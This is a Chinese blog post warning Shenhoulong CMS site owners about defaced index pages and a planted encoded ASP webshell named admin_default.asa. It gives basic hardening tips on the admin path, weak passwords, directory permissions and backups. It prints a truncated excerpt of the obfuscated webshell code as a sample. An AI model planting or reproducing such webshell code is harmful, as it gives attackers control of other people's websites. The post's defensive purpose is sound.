• 欢迎访问开心洋葱网站,在线教程,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,欢迎加入开心洋葱 QQ群
  • 为方便开心洋葱网用户,开心洋葱官网已经开启复制功能!
  • 欢迎访问开心洋葱网站,手机也能访问哦~欢迎加入开心洋葱多维思维学习平台 QQ群
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏开心洋葱吧~~~~~~~~~~~~~!
  • 由于近期流量激增,小站的ECS没能经的起亲们的访问,本站依然没有盈利,如果各位看如果觉着文字不错,还请看官给小站打个赏~~~~~~~~~~~~~!

Shlcms-深喉咙CMS建站ASP木马预防

PHP 开心洋葱 1851次浏览 0个评论

Shlcms-深喉咙CMS建站ASP木马预防

 

最近使用深喉咙CMS建站的朋友们,发现首页的index.php被篡改,有的是打不开有的是网站的样子变了,在后台会发现 admin_default.asa 的代码文件,这个是ASP脚本写的一个加密木马文件,内容大体如下


<%@ LANGUAGE = VBScript.Encode %>
<%#@~^dlUBAA==@#@&jdDhl/k'r^xKYEP,P~~,PP,~P,PP,~~P,PE修改密码@#@&:HCs+xJ笑佛天下r~@#@&?rOjIJxrtOYalJzAShcoR1WsEP,P~P,P~~,PPE网站@#@&;WwH.ro4Y{J游天下EP~~,B版权@#@&z9'r傲不可长P欲不可纵~乐不可极~志不可满,"PPrs+EP,~E广告文字@#@&(L{JaZ!ZT!ZJ~PE设置背景颜色@#@&A.'J[os;Z!ZE~PE设置文字颜色@#@&4;N;xraosO1!ZJ~~E设置按钮对话框颜色@#@&@#@&@#@&j+M-D UmMkwDKbh+KEO'O,11O,,O1)"+/aGU/R~EW0n.,'OD!n)}x~3MDW.~"+dEsn,1nXY=/E(PU4WS2.Dv#l(6P2M.P:t+ @#@&I"?r@!8D@*@!mP4DW'ELC-m/m.raYltbdDW.HR(lm0`*v@*@!4.@*,J~',2DM f/mMr2YbW P'PE@!Jl@*@!(.@*r@#@&3MDR/sl.)"nkwG /Rs^Ek4@#@&2UN,qW@#@&+x9~/!4)U;8P"IU`dY.b=Dn/aGxk+ AMkYnckY.#=3 N~UE()s!x1OkKx~InCO4`?*lInlD4xIw^l^+cjBJwJBE-'JblAxN~o!x^YbG )o!x1YkKx,]InCY4`jb=IIKlDt'"n2Vmm`j~Ew'JSJ'E#=2U[,sEU^DkGx=i"Sx"+$E+kYcj+M\nDjl.rm4Vd`rjIdEb)U+M\nD(K{In;!n/DRjnM\+.#mDrl(s/crS}Zbd{z9f"Jb)zmOrKx'"n;!+/DcEb1YbWUJbl"WGYhCY4'jnM\+. tl2nmO4`EcJ*)q"GWD'j+M\n.cHlaKlDt`r&E#=/D-+.;{Dn;!n/DRdnM\+.-mDrl(s/crtDYw|tKdYr#'EMVldD\.w{E/.2lk/=wG/;.^'EtDOwr)oG^N+.KmY4'"n$EnkYvJsKV9nDhlOtr#logl:xI;EdO`rsglh+Eb=ACm0iD^'E@!(D@*@!8M@*@!mUD+.@*@!mPtM+6xBNl-lkm.raY)4r/DWDH 8l13v#v@*返回@!&m@*@!z1nxD+.@*r@#@&[rsPjtbjmxSUtb?l 1A/DDS?4kjC q)w;x1YkKU~?4kUlUs;Uv?4kUCx}4%dDD#@#@&Utr?mU}4%kYMP',I2Vmmn`Utrjmxr(%/DD~,E╁E~,JrJE#loKD~?4r?mx(~{PF~PKPJ+ cUtrUl r4N/D.#=qWPtk[cUtkUCx}4LkO.~,?4kjlU(BPq#,@!@*,J╋E~:t+U@#@&?4kUC…………………………… 


 

 为了安全起见这是部分代码 ,就不公布全部打代码了,一个很厉害的ASP木马,功能超强。构成网站能够上传木马和篡改程序文件,并挂上木马的原因,大致如下,有用此程序的广大站长们,可以查看下自己的网站运行情况。

1、可能是因为后台的地址admini没有修改,不知道深喉咙为什么固定了这个后台地址,提醒广大站长为了安全起见,有条件的最好把这个地址更换一下

2、后台的登录用户名、密码过于简单,现在还有些站长们把自己的登录名设置为admin 密码也设置为 admin ,多么可怕啊,这样的运行,别人没有顶上你,让黑客顶上了,这样的站是一黑一个准的

3、程序的目录权限没有设置好,只要有上传图片的文件夹设置为可写,其他像程序文件可以设置为只读,具体可以参见深喉咙的官方CMS的设置。

 

PS: 经常备份自己的网站,如果被黑后可以恢复最近的网站程序和数据!!!

 


开心洋葱 , 版权所有丨如未注明 , 均为原创丨未经授权请勿修改 , 转载请注明Shlcms-深喉咙CMS建站ASP木马预防
喜欢 (0)

您必须 登录 才能发表评论!

加载中……